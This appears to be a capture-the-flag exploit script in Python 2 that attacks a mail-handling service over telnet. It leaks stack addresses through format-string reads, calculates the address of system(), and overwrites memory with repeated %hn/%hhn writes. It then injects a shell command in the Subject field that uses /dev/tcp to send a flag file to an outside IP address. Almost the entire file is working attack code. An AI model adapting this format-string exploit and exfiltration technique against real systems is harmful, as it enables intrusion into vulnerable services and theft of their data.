#!/usr/bin/env python
#-*- coding:utf-8 -*-

import os, sys, socket
import telnetlib


st = telnetlib.Telnet('pwnbox.ztx.io', 2337)

def S(x):
    st.write(x)

def W(x,Show=False):
    tmp=st.read_until(x)
    if Show:
        print tmp
    return tmp


cmd = ';echo "cat flag>/dev/tcp/166.111.132.155/1234 0<&1"|/bin/bash'
W('Exit')
S('1'+'\n')
W('To: ')
S('recver'+'\n')
W('Subject: ')
S(cmd+'\n')
W('Body')
S('%15$lx,%21$lx,%34$lx'+'\n')
W('Exit')
S('3'+'\n')
W('Subject: ')
S('1'+'\n')
W('Subject:')
W('\n')

a,b,c= W('\n').strip().split(',')
system=int(c.split('\n')[0],16)+130251
a=int(a.split('\n')[-1],16)
b=int(b,16)

def FA(fmt, mail = 2, delete = True):
    W('Exit')
    S('1'+'\n')
    W('To: ')
    S('recver'+'\n')
    W('Subject: ')
    S(cmd+'\n')
    W('Body')
    S(fmt+'\n')
    W('Exit')
    S('3'+'\n')
    W('[' + str(mail) + ']')
    S(str(mail)+'\n')

    if delete:
        W('Exit')
        S('4'+'\n')
        W('[2]')
        S('2'+'\n')

FA("%09056d%21$hn")
FA("%0" + str(((b & 0xff) + 2) & 0xff)  + "d%15$hhn")
FA("%096d%21$hn")
FA("%0" + str(((b & 0xff) + 4) & 0xff)  + "d%15$hhn")
FA("%21$hn")
FA("%0" + str(system & 0xffff) + "d%27$hn", delete = False)
FA("%0" + str(b & 0xff) + "d%15$hhn", mail = 3, delete = False)
FA("%09058d%21$hn", mail = 4, delete = False)
FA("%0" + str((system >> 16) & 0xffff) + "d%27$hn", mail = 5, delete = False)

W('Exit')
S('4'+'\n')
st.interact()

